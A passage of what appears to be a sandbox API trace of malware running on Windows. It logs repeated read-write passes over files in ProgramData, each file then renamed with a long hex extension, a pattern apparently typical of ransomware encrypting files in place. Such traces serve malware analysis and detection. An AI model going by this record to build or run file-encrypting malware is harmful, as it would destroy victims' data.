ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.609] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" [0156.609] GetProcessHeap () returned 0x270000 [0156.609] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x36c5b8 [0156.609] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c5b8, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0156.612] CloseHandle (hObject=0x5a0) returned 1 [0156.616] GetProcessHeap () returned 0x270000 [0156.618] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.618] RtlInterlockedCompareExchange64 () returned 0x1 [0156.618] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.621] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 
lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.624] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.625] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", lpString2=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" [0156.625] GetProcessHeap () returned 0x270000 [0156.625] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19c) returned 0x36c770 [0156.626] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c770, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0156.627] CloseHandle (hObject=0x5a0) returned 1 [0156.631] GetProcessHeap () returned 0x270000 [0156.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.632] RtlInterlockedCompareExchange64 () returned 0x1 [0156.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.637] ReadFile (in: hFile=0x5a0, lpBuffer=0x7600180, 
nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.637] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.640] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.641] RtlInterlockedCompareExchange64 () returned 0x0 [0156.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.642] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75e00f8, ReturnLength=0x723f8ec) returned 0x0 [0156.643] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") 
returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" [0156.643] GetProcessHeap () returned 0x270000 [0156.643] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1be) returned 0x36c918 [0156.643] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x36c918, Length=0x1be, FileInformationClass=0xa) returned 0x0 [0156.645] CloseHandle (hObject=0x5a0) returned 1 [0156.648] GetProcessHeap () returned 0x270000 [0156.650] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.650] RtlInterlockedCompareExchange64 () returned 0x1 [0156.650] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.653] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.654] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.981] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.982] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.986] RtlInterlockedCompareExchange64 () returned 0x1 [0156.986] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.988] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73f0100, ReturnLength=0x723f8ec) returned 0x0 [0157.091] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpString2=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" [0157.091] GetProcessHeap () returned 0x270000 [0157.091] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x31c2d0 [0157.091] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x31c2d0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0157.099] CloseHandle (hObject=0x58c) returned 1 [0157.104] GetProcessHeap () returned 0x270000 [0157.128] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.136] 
RtlInterlockedCompareExchange64 () returned 0x1 [0157.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.148] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0157.149] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.149] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0157.151] RtlInterlockedCompareExchange64 () returned 0x0 [0157.151] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.152] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0157.153] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", lpString2=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" [0157.153] GetProcessHeap () returned 0x270000 [0157.153] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x320270 [0157.154] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x320270, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0157.155] CloseHandle (hObject=0x58c) returned 1 [0157.165] GetProcessHeap () returned 0x270000 [0157.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.166] RtlInterlockedCompareExchange64 () returned 0x1 [0157.167] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.403] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0157.403] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.404] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0157.407] RtlInterlockedCompareExchange64 () returned 0x0 [0157.407] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.408] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73f0100, ReturnLength=0x723f8ec) returned 0x0 [0157.409] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log", lpString2=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" [0157.409] GetProcessHeap () returned 0x270000 [0157.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x35ad68 [0157.409] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x35ad68, Length=0x154, FileInformationClass=0xa) returned 0x0 [0157.410] CloseHandle (hObject=0x58c) returned 1 [0157.415] GetProcessHeap () returned 0x270000 [0157.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.418] RtlInterlockedCompareExchange64 () returned 0x1 [0157.418] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.620] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, 
nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0157.622] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.623] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0157.627] RtlInterlockedCompareExchange64 () returned 0x0 [0157.627] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0157.628] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0157.629] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" [0157.630] 
GetProcessHeap () returned 0x270000 [0157.630] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x42f01d0 [0157.630] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x723f8dc, FileInformation=0x42f01d0, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0157.634] CloseHandle (hObject=0x4a8) returned 1 [0157.995] GetProcessHeap () returned 0x270000 [0157.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.996] RtlInterlockedCompareExchange64 () returned 0x1 [0157.996] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.025] ReadFile (in: hFile=0x5a0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.025] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.026] WriteFile (in: hFile=0x5a0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.028] RtlInterlockedCompareExchange64 () returned 0x0 [0158.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.029] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, 
ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.030] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.66316E8DEE6B799E6F373C35C8BB6CAE921B2F17336A572F4F2B2A499C2AE96B" [0158.030] GetProcessHeap () returned 0x270000 [0158.030] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278bf0 [0158.030] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x4278bf0, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0158.033] CloseHandle (hObject=0x5a0) returned 1 [0158.057] GetProcessHeap () returned 0x270000 [0158.060] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.060] RtlInterlockedCompareExchange64 () returned 0x1 [0158.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.095] ReadFile (in: hFile=0x4a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.095] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.096] WriteFile (in: hFile=0x4a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.099] RtlInterlockedCompareExchange64 () returned 0x0 [0158.099] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.099] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.101] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" [0158.101] GetProcessHeap () returned 0x270000 [0158.101] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1aa) returned 0x42f0388 [0158.101] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x723f8dc, 
FileInformation=0x42f0388, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0158.105] CloseHandle (hObject=0x4a8) returned 1 [0158.183] GetProcessHeap () returned 0x270000 [0158.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.184] RtlInterlockedCompareExchange64 () returned 0x1 [0158.185] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.248] ReadFile (in: hFile=0x5a0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.248] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.250] WriteFile (in: hFile=0x5a0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.253] RtlInterlockedCompareExchange64 () returned 0x0 [0158.254] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, 